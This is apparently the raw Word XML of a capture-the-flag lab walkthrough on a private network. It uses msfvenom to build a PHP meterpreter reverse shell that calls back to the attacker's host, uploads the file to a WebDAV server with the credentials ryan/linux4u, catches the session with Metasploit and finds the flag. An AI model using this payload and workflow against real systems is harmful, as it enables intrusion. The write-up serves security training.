        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6AF83C" w14:textId="77777777" w:rsidR="009C57E7" w:rsidRPr="009C57E7" w:rsidRDefault="009C57E7" w:rsidP="009C57E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C57E7">
        <w:t xml:space="preserve">Create a malicious PHP file using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C57E7">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6ACEB2AD" w14:textId="77777777" w:rsidR="009C57E7" w:rsidRPr="009C57E7" w:rsidRDefault="009C57E7" w:rsidP="009C57E7"/>
    <w:p w14:paraId="0EE97492" w14:textId="5F8E2DBA" w:rsidR="0013741F" w:rsidRDefault="009C57E7" w:rsidP="009C57E7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C57E7">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C57E7">
        <w:t xml:space="preserve"> -p php/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C57E7">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C57E7">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C57E7">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C57E7">
        <w:t xml:space="preserve"> LHOST=192.168.1.90</w:t>
      </w:r>
      <w:r w:rsidR="0013741F" w:rsidRPr="009C57E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C57E7">
        <w:t>LPORT=80 -f raw -o shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7D1B40" w14:textId="2A3F78B4" w:rsidR="009C57E7" w:rsidRDefault="009C57E7" w:rsidP="009C57E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where LHOST and LPORT are the IP and Port of the attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60064A09" w14:textId="6C532165" w:rsidR="009C57E7" w:rsidRDefault="009C57E7" w:rsidP="009C57E7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C350FA2" w14:textId="50114870" w:rsidR="009C57E7" w:rsidRDefault="00597ACA" w:rsidP="009C57E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Through File Manager log into WebDAV server at dav://192.168.1.105/webdav using Ryan’s credentials (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/linux4u).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4782F4" w14:textId="082C8C44" w:rsidR="00597ACA" w:rsidRDefault="00597ACA" w:rsidP="00597ACA"/>
    <w:p w14:paraId="300DB730" w14:textId="68FE2CF3" w:rsidR="00597ACA" w:rsidRDefault="00AA2F5F" w:rsidP="00597ACA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0F625B" wp14:editId="25161FC0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>957532</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>690114</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1250830" cy="103516"/>
                <wp:effectExtent l="0" t="0" r="26035" b="107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10351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D6FB6" id="Rectangle 25" o:spid="_x0000_s1026" style="position:absolute;margin-left:75.4pt;margin-top:54.35pt;width:98.5pt;height:8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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="32896f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00597ACA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CF10EF8" wp14:editId="31216D49">
            <wp:extent cx="3731167" cy="326078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6291" cy="327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765E" w14:textId="6A6A44A3" w:rsidR="00597ACA" w:rsidRDefault="00597ACA" w:rsidP="00597ACA"/>
    <w:p w14:paraId="09D8071F" w14:textId="5A3754F8" w:rsidR="00597ACA" w:rsidRDefault="00597ACA" w:rsidP="00597ACA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Copy PHP reverse shell created earlier onto WebDAV server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11683A3D" w14:textId="469271B5" w:rsidR="00597ACA" w:rsidRDefault="00597ACA" w:rsidP="00597ACA"/>
    <w:p w14:paraId="7B211A12" w14:textId="37336D92" w:rsidR="00597ACA" w:rsidRDefault="00EA6A52" w:rsidP="00597ACA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DE3AB8" wp14:editId="488C7180">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2467155</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1498145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="655607" cy="879894"/>
                <wp:effectExtent l="0" t="0" r="11430" b="158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87989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EE5D0" id="Rectangle 30" o:spid="_x0000_s1026" style="position:absolute;margin-left:194.25pt;margin-top:117.95pt;width:51.6pt;height:69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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="32896f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA2F5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3A76BF" wp14:editId="74537E08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1518249</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>885669</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2009955" cy="172529"/>
                <wp:effectExtent l="0" t="0" r="28575" b="1841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955" cy="17252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4297D" id="Rectangle 26" o:spid="_x0000_s1026" style="position:absolute;margin-left:119.55pt;margin-top:69.75pt;width:158.25pt;height:1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" fillcolor="yellow" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="32896f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00597ACA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="457784D5" wp14:editId="5F54132B">
            <wp:extent cx="5943600" cy="4992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179A" w14:textId="769266FA" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="00597ACA"/>
    <w:p w14:paraId="69856B65" w14:textId="455B6747" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Execute the payload loaded to the site to open a meterpreter session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E95E70F" w14:textId="401FACE2" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913"/>
    <w:p w14:paraId="1A382123" w14:textId="3049E957" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In the command console start Metasploit (msfconsole)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CDCF23" w14:textId="52D25BB9" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use exploit/multi/handler module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F4E22" w14:textId="4F71F211" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set the LHOST to the attacker’s machine (set LHOST 192.168.1.90</w:t>
      </w:r>
      <w:r w:rsidR="002508E8">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1BB06" w14:textId="748F9B42" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set the LPORT to the attacker’s port (set LPORT 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44441EE0" w14:textId="15597373" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set the PAYLOAD to the payload type we loaded on the victim’s server (set PAYLOAD php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FDF9DA" w14:textId="584D4F70" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start the meterpreter session (exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED5FF1" w14:textId="5B57E032" w:rsidR="005A5913" w:rsidRDefault="005A5913" w:rsidP="005A5913"/>
    <w:p w14:paraId="5540BB39" w14:textId="21F2527D" w:rsidR="005A5913" w:rsidRDefault="00EA6A52" w:rsidP="005A5913">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6853458C" wp14:editId="7E374261">
            <wp:extent cx="5943600" cy="37484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C690" w14:textId="28FA7E59" w:rsidR="009C57E7" w:rsidRDefault="009C57E7" w:rsidP="009C57E7"/>
    <w:p w14:paraId="2CCDE098" w14:textId="6D695259" w:rsidR="00EA6A52" w:rsidRDefault="00EA6A52" w:rsidP="00EA6A52">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Now, when shell.php is clicked on the webpage of the WebDAV server, a session of the victim’s machine is started on the attacker’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773A24E5" w14:textId="77777777" w:rsidR="00EA6A52" w:rsidRDefault="00EA6A52" w:rsidP="00EA6A52"/>
    <w:p w14:paraId="6E6B95A7" w14:textId="1EF84A8E" w:rsidR="009C57E7" w:rsidRDefault="00EA6A52" w:rsidP="009C57E7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50DA24" wp14:editId="24A34517">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>51757</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2302390</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3209027" cy="267419"/>
                <wp:effectExtent l="0" t="0" r="10795" b="1841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027" cy="2674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BABD9" id="Rectangle 31" o:spid="_x0000_s1026" style="position:absolute;margin-left:4.1pt;margin-top:181.3pt;width:252.7pt;height:21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E762BE0" wp14:editId="5F5F0F27">
            <wp:extent cx="5943600" cy="34461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7CC6" w14:textId="269E46F1" w:rsidR="00EA6A52" w:rsidRPr="009C57E7" w:rsidRDefault="00EA6A52" w:rsidP="009C57E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145F3F" wp14:editId="2DE894C7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>431321</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5124091" cy="241539"/>
                <wp:effectExtent l="0" t="0" r="19685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091" cy="24153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1B9C8" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:33.95pt;width:403.45pt;height:19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F98865A" wp14:editId="0F7358E4">
            <wp:extent cx="5943600" cy="1069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E29E" w14:textId="77777777" w:rsidR="009C57E7" w:rsidRDefault="009C57E7" w:rsidP="009C57E7"/>
    <w:p w14:paraId="41DBC2F8" w14:textId="7F0A000A" w:rsidR="00EA6A52" w:rsidRDefault="00EA6A52" w:rsidP="00EA6A52">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6A52">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Find and capture the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2D596" w14:textId="77777777" w:rsidR="00EA6A52" w:rsidRDefault="00EA6A52" w:rsidP="00EA6A52"/>
    <w:p w14:paraId="468195BE" w14:textId="5EFC981D" w:rsidR="0013741F" w:rsidRDefault="00EA6A52" w:rsidP="00EA6A52">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Now that a session on the victim’s computer has been initiated, we can search it for the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B648786" w14:textId="486C2D3F" w:rsidR="00EA6A52" w:rsidRDefault="00EA6A52" w:rsidP="00EA6A52">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We find the flag under the main directory on the victim’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C64CF" w14:textId="7386A399" w:rsidR="00EA6A52" w:rsidRDefault="00EA6A52" w:rsidP="00EA6A52"/>
    <w:p w14:paraId="0F3F2A1C" w14:textId="2E3B6580" w:rsidR="00EA6A52" w:rsidRDefault="00E2312C" w:rsidP="00EA6A52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EE4D8D" wp14:editId="3E39FC63">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3317995</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1017917" cy="232913"/>
                <wp:effectExtent l="0" t="0" r="10795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23291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B81B9" id="Rectangle 35" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:261.25pt;width:80.15pt;height:18.3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F8E44B" wp14:editId="31BBDAA9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1014742</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3528204" cy="129396"/>
                <wp:effectExtent l="0" t="0" r="15240" b="234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204" cy="12939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9C578" id="Rectangle 34" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:79.9pt;width:277.8pt;height:10.2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EA6A52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CE0041E" wp14:editId="7D1D1703">
            <wp:extent cx="4072269" cy="3752491"/>
            <wp:effectExtent l="0" t="0" r="444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649" cy="376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25DB" w14:textId="0C6B2C74" w:rsidR="00E2312C" w:rsidRDefault="00E2312C" w:rsidP="00EA6A52"/>
    <w:p w14:paraId="2EA8414D" w14:textId="37B1AE53" w:rsidR="00E2312C" w:rsidRPr="00F7163A" w:rsidRDefault="00E2312C" w:rsidP="00EA6A52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240E674" wp14:editId="57034EE3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>86264</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>602483</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1492370" cy="215661"/>
                <wp:effectExtent l="0" t="0" r="12700" b="1333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370" cy="21566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25E0A" id="Rectangle 37" o:spid="_x0000_s1026" style="position:absolute;margin-left:6.8pt;margin-top:47.45pt;width:117.5pt;height:17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F3B6699" wp14:editId="65D61920">
            <wp:extent cx="4727275" cy="2182830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479" cy="219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12C" w:rsidRPr="00F71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E49A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A6E3440"/>
    <w:lvl w:ilvl="0" w:tplc="27EA8A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62641"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADFC2C08"/>
    <w:lvl w:ilvl="0" w:tplc="27EA8A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70D70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46B04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4B1D01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CCA8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9B2206"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C9621FA"/>
    <w:lvl w:ilvl="0" w:tplc="27EA8A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C0B"/>
    <w:rsid w:val="000F4C0B"/>
    <w:rsid w:val="0013741F"/>
    <w:rsid w:val="001A6C92"/>
    <w:rsid w:val="001A792F"/>
    <w:rsid w:val="001D7DB6"/>
    <w:rsid w:val="001F156E"/>
    <w:rsid w:val="001F4E12"/>
    <w:rsid w:val="002508E8"/>
    <w:rsid w:val="00252012"/>
    <w:rsid w:val="00450DDA"/>
    <w:rsid w:val="00467438"/>
    <w:rsid w:val="0054472F"/>
    <w:rsid w:val="00597ACA"/>
    <w:rsid w:val="005A5913"/>
    <w:rsid w:val="005F337E"/>
    <w:rsid w:val="005F6FAE"/>
    <w:rsid w:val="006D7BB4"/>
    <w:rsid w:val="007F3C32"/>
    <w:rsid w:val="0087251A"/>
    <w:rsid w:val="0089463A"/>
    <w:rsid w:val="00942F76"/>
    <w:rsid w:val="009C57E7"/>
    <w:rsid w:val="00AA2F5F"/>
    <w:rsid w:val="00B252A2"/>
    <w:rsid w:val="00CB122D"/>
    <w:rsid w:val="00E2312C"/>
    <w:rsid w:val="00EA6A52"/>
    <w:rsid w:val="00EE46AF"/>
    <w:rsid w:val="00F7163A"/>
    <w:rsid w:val="00FE4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08EFF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FCA825E8-5BA8-4BF1-A546-049FDCBFD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0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing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C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16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6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192.168.1.105:80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192.168.1.105/webdav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8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 jaj</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Family jaj</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-14T23:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-29T03:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>